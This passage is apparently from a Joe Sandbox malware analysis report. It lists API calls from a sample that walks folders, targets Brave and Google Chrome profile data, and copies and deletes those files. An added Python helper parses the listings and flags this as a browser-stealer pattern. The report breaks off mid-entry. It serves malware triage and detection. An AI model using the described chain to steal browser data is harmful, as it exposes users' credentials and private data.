                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                  • String ID: \*.*
                                  • API String ID: 4127656590-1173974218
                                  • Opcode ID: 68cd80a979535a97de866f127c76e6a3042f28859a98502f309ad37b561ded2c
                                  • Instruction ID: fe3d9e53bc36a650f7a289fd4bcdbfb80f8e71f35128f2b55f4c9eed15d5c602
                                  • Opcode Fuzzy Hash: 68cd80a979535a97de866f127c76e6a3042f28859a98502f309ad37b561ded2c
                                  • Instruction Fuzzy Hash: EF926C3191161AABCB23AF64DD89AAF77F9AF14300F454124F809AF211DB34FD95DBA0
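                                  The API listings in this report are the most useful behavioural evidence it carries: the lstrcpy/lstrcat/lstrlen runs build paths, "\*.*" is appended and handed to FindFirstFileA, SHGetFolderPathA resolves a shell folder, and in the listing that follows the walk is narrowed to Brave and Google Chrome profile data (\Brave\Preferences) before CopyFileA and DeleteFileA. The following Python triage helper is an added example and not part of the Joe Sandbox report or the sample's own code: it parses lines written in this report's "APIs" format and summarises that chain per function. The input lines are constructed to mirror the report's entries, the CSIDL table holds the well-known Windows constants, and the PROFILE_MARKERS list is the author's choice of literals taken from the listings on this page.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Added example (not from the Joe Sandbox report): parse a function's "APIs"
# listing and flag the directory-walk / browser-profile / copy-out chain.

# Matches lines such as '• lstrcat.KERNEL32(00000000,\*.*), ref: 00352436' and the
# indented '• Part of subcall function 00364040: SHGetFolderPathA.SHELL32(...), ref: ...'.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Second argument of SHGetFolderPathA; standard CSIDL constants.
CSIDL_NAMES = {
    0x05: "CSIDL_PERSONAL",
    0x10: "CSIDL_DESKTOPDIRECTORY",
    0x1A: "CSIDL_APPDATA",
    0x1C: "CSIDL_LOCAL_APPDATA",
    0x28: "CSIDL_PROFILE",
}

# Literals from this report that point at browser profile data (author's selection).
PROFILE_MARKERS = ("Brave", "Preferences", "Google Chrome")

# Constructed sample in the report's format; addresses mirror entries on this page.
SAMPLE_APIS = r"""
• lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003523D4
• lstrcat.KERNEL32(00000000,\*.*), ref: 00352436
• FindFirstFileA.KERNEL32(00000000,?), ref: 00352486
• StrCmpCA.SHLWAPI(?,003717A0), ref: 0034DCF0
• StrCmpCA.SHLWAPI(?,Brave), ref: 0034E0CD
• StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0034E776
• lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0034E2A7
• CopyFileA.KERNEL32(00000000,?,00000001), ref: 0034E1F9
• DeleteFileA.KERNEL32(?), ref: 0034E381
  • Part of subcall function 00364040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0036406D
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    subcall_of: Optional[int] = None   # set when the line is a 'Part of subcall function' entry


def parse_api_lines(text: str) -> list:
    """Parse '• api.MODULE(arg,arg), ref: ADDR' lines; headings like 'Strings' are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        sub = m.group("sub")
        calls.append(ApiCall(api=m.group("api"), module=m.group("module"), args=args,
                             ref=int(m.group("ref"), 16),
                             subcall_of=int(sub, 16) if sub else None))
    return calls


def decode_csidl(arg: str) -> str:
    """Translate a hex CSIDL argument to its name; non-hex placeholders ('?') pass through."""
    try:
        value = int(arg, 16)
    except ValueError:
        return arg
    # Mask off CSIDL_FLAG_* bits (0x8000 and above); plain CSIDL ids fit in one byte.
    return CSIDL_NAMES.get(value & 0xFF, f"CSIDL_0x{value:04X}")


def collapse_sequence(calls: list) -> list:
    """Collapse consecutive calls to the same API into (api, run_length) pairs."""
    runs = []
    for c in calls:
        if runs and runs[-1][0] == c.api:
            runs[-1] = (c.api, runs[-1][1] + 1)
        else:
            runs.append((c.api, 1))
    return runs


def assess(calls: list) -> dict:
    """Summarise what a function does from its API calls and literal arguments."""
    apis = {c.api for c in calls}
    literals = [a for c in calls for a in c.args]
    summary = {
        "walks_directory": "FindFirstFileA" in apis and any(a.endswith("\\*.*") for a in literals),
        "resolves_folders": [decode_csidl(c.args[1]) for c in calls
                             if c.api == "SHGetFolderPathA" and len(c.args) > 1],
        "profile_markers": sorted({m for a in literals for m in PROFILE_MARKERS if m in a}),
        "copies_files": "CopyFileA" in apis,
        "deletes_files": "DeleteFileA" in apis,
    }
    # Enumerate a directory, look for browser profile data, copy it out: the stealer chain.
    summary["stealer_pattern"] = (summary["walks_directory"]
                                  and bool(summary["profile_markers"])
                                  and summary["copies_files"])
    return summary


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_APIS)
    print(collapse_sequence(calls))
    for key, value in assess(calls).items():
        print(f"{key}: {value}")
```

Paste a function's "APIs" block from the report into SAMPLE_APIS (or read it from a file) to get the same summary for that function; collapse_sequence is what makes the long lstrcpy/lstrcat/lstrlen listings above readable as a handful of path-building steps around each FindFirstFileA, CopyFileA or DeleteFileA.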
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DBEF
                                  • lstrlen.KERNEL32(00374CA8), ref: 0034DBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DC17
                                  • lstrcat.KERNEL32(00000000,00374CA8), ref: 0034DC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DC4C
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DC8F
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0034DCD0
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0034DCF0
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 0034DD0A
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0034DD1D
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DD7B
                                  • lstrlen.KERNEL32(00371794), ref: 0034DD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DDA3
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DDAF
                                  • lstrlen.KERNEL32(?), ref: 0034DDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 0034DDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DE19
                                  • lstrlen.KERNEL32(00371794), ref: 0034DE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034DE6F
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DE7B
                                  • lstrlen.KERNEL32(00FA89E8), ref: 0034DE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DEBB
                                  • lstrlen.KERNEL32(00371794), ref: 0034DEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034DEE6
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DEF2
                                  • lstrlen.KERNEL32(00FA87F8), ref: 0034DF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DFA5
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DFB1
                                  • lstrlen.KERNEL32(00FA89E8), ref: 0034DFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DFF4
                                  • lstrlen.KERNEL32(00371794), ref: 0034DFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E022
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034E02E
                                  • lstrlen.KERNEL32(00FA87F8), ref: 0034E03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034E06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 0034E0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 0034E0E7
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034E11F
                                  • lstrlen.KERNEL32(00FAC6B0), ref: 0034E12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E155
                                  • lstrcat.KERNEL32(00000000,?), ref: 0034E15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E19F
                                  • lstrcat.KERNEL32(00000000), ref: 0034E1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0034E1F9
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034E22F
                                  • lstrlen.KERNEL32(00FA8858), ref: 0034E23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E261
                                  • lstrcat.KERNEL32(00000000,00FA8858), ref: 0034E269
                                  • lstrlen.KERNEL32(\Brave\Preferences), ref: 0034E274
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E29B
                                  • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0034E2A7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E2CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E30F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E349
                                  • DeleteFileA.KERNEL32(?), ref: 0034E381
                                  • StrCmpCA.SHLWAPI(?,00FAC638), ref: 0034E3AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E3F4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E41C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E445
                                  • StrCmpCA.SHLWAPI(?,00FA87F8), ref: 0034E468
                                  • StrCmpCA.SHLWAPI(?,00FA89E8), ref: 0034E47D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E4D9
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0034E4E0
                                  • StrCmpCA.SHLWAPI(?,00FAC470), ref: 0034E58E
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034E5C4
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0034E639
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E678
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E6A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E6C7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E70E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E737
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E75C
                                  • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0034E776
                                  • DeleteFileA.KERNEL32(?), ref: 0034E7D2
                                  • StrCmpCA.SHLWAPI(?,00FA8928), ref: 0034E7FC
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E88C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E8B5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E8EE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E916
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 2635522530-726946144
                                  • Opcode ID: 3175d9af235cbf78de5e4a3aa5e8dd26d4d751191043925d0a61e5c93d683f55
                                  • Instruction ID: 40de5bb77f2202b4df2972b2f70a160ce9bff22707759e9eee6766357ca9aaa2
                                  • Opcode Fuzzy Hash: 3175d9af235cbf78de5e4a3aa5e8dd26d4d751191043925d0a61e5c93d683f55
                                  • Instruction Fuzzy Hash: 88926E719102069BCB22EF64DC89AAE7BF9BF54300F454568F809AF251DB34FC59DBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003518D2
                                  • lstrlen.KERNEL32(\*.*), ref: 003518DD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003518FF
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 0035190B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351932
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00351947
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 00351967
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 00351981
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003519BF
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003519F2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00351A1A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00351A25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351A4C
                                  • lstrlen.KERNEL32(00371794), ref: 00351A5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351A80
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351AB4
                                  • lstrlen.KERNEL32(?), ref: 00351AC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351AE5
                                  • lstrcat.KERNEL32(00000000,?), ref: 00351AF3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351B19
                                  • lstrlen.KERNEL32(00FA8958), ref: 00351B2F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351B59
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00351B64
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351B8F
                                  • lstrlen.KERNEL32(00371794), ref: 00351BA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351BC3
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351BCF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351BF8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351C25
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00351C30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351C57
                                  • lstrlen.KERNEL32(00371794), ref: 00351C69
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351C8B
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351C97
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351CC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351CEF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00351CFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351D21
                                  • lstrlen.KERNEL32(00371794), ref: 00351D33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351D55
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351D61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351D8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351DB9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00351DC4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351DED
                                  • lstrlen.KERNEL32(00371794), ref: 00351E19
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351E36
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351E42
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351E68
                                  • lstrlen.KERNEL32(00FAC710), ref: 00351E7E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351EB2
                                  • lstrlen.KERNEL32(00371794), ref: 00351EC6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351EE3
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351EEF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351F15
                                  • lstrlen.KERNEL32(00FAD270), ref: 00351F2B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351F5F
                                  • lstrlen.KERNEL32(00371794), ref: 00351F73
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351F90
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351F9C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351FC2
                                  • lstrlen.KERNEL32(00F9AE28), ref: 00351FD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00352000
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035200B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00352036
                                  • lstrlen.KERNEL32(00371794), ref: 00352048
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00352067
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00352073
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00352098
                                  • lstrlen.KERNEL32(?), ref: 003520AC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003520D0
                                  • lstrcat.KERNEL32(00000000,?), ref: 003520DE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00352103
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035213F
                                  • lstrlen.KERNEL32(00FAC6B0), ref: 0035214E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00352176
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00352181
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                  • String ID: \*.*
                                  • API String ID: 712834838-1173974218
                                  • Opcode ID: 874188edf398ce7545a9da34bf9b29dd38e74e5b456fb77e681df0106d390532
                                  • Instruction ID: ff0db493b6397fd4a5c01ef3017687f231439a1f78afc8e8e708c50ced9e1963
                                  • Opcode Fuzzy Hash: 874188edf398ce7545a9da34bf9b29dd38e74e5b456fb77e681df0106d390532
                                  • Instruction Fuzzy Hash: D462BD31911616ABCB23AF64DC89EBF77B9AF54701F450024FC09AB260DB34ED59DBA0
                                  APIs
                                  • wsprintfA.USER32 ref: 0035392C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00353943
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035396C
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 00353986
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003539BF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003539E7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003539F2
                                  • lstrlen.KERNEL32(00371794), ref: 003539FD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353A1A
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00353A26
                                  • lstrlen.KERNEL32(?), ref: 00353A33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353A53
                                  • lstrcat.KERNEL32(00000000,?), ref: 00353A61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353A8A
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00353ACE
                                  • lstrlen.KERNEL32(?), ref: 00353AD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353B05
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00353B10
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353B36
                                  • lstrlen.KERNEL32(00371794), ref: 00353B48
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353B6A
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00353B76
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353B9E
                                  • lstrlen.KERNEL32(?), ref: 00353BB2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353BD2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00353BE0
                                  • lstrlen.KERNEL32(00FA8858), ref: 00353C0B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353C31
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00353C3C
                                  • lstrlen.KERNEL32(00FA8958), ref: 00353C5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353C84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00353C8F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353CB7
                                  • lstrlen.KERNEL32(00371794), ref: 00353CC9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353CE8
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00353CF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353D1A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00353D47
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00353D52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353D79
                                  • lstrlen.KERNEL32(00371794), ref: 00353D8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353DAD
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00353DB9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353DE2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353E11
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00353E1C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353E43
                                  • lstrlen.KERNEL32(00371794), ref: 00353E55
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353E77
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00353E83
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353EAC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353EDB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00353EE6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353F0D
                                  • lstrlen.KERNEL32(00371794), ref: 00353F1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353F41
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00353F4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353F75
                                  • lstrlen.KERNEL32(?), ref: 00353F89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353FA9
                                  • lstrcat.KERNEL32(00000000,?), ref: 00353FB7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353FE0
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035401F
                                  • lstrlen.KERNEL32(00FAC6B0), ref: 0035402E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354056
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00354061
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035408A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003540CE
                                  • lstrcat.KERNEL32(00000000), ref: 003540DB
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003542D9
                                  • FindClose.KERNEL32(00000000), ref: 003542E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 1006159827-1013718255
                                  • Opcode ID: db71b2644b607f4f0fe3999c46c73f5052a10d81e8deaffe03971d3098661201
                                  • Instruction ID: f9ce50046cb944f7c5ed6ee1bf41f63fd41dd2dff009e3a1cb5caa473e6e5610
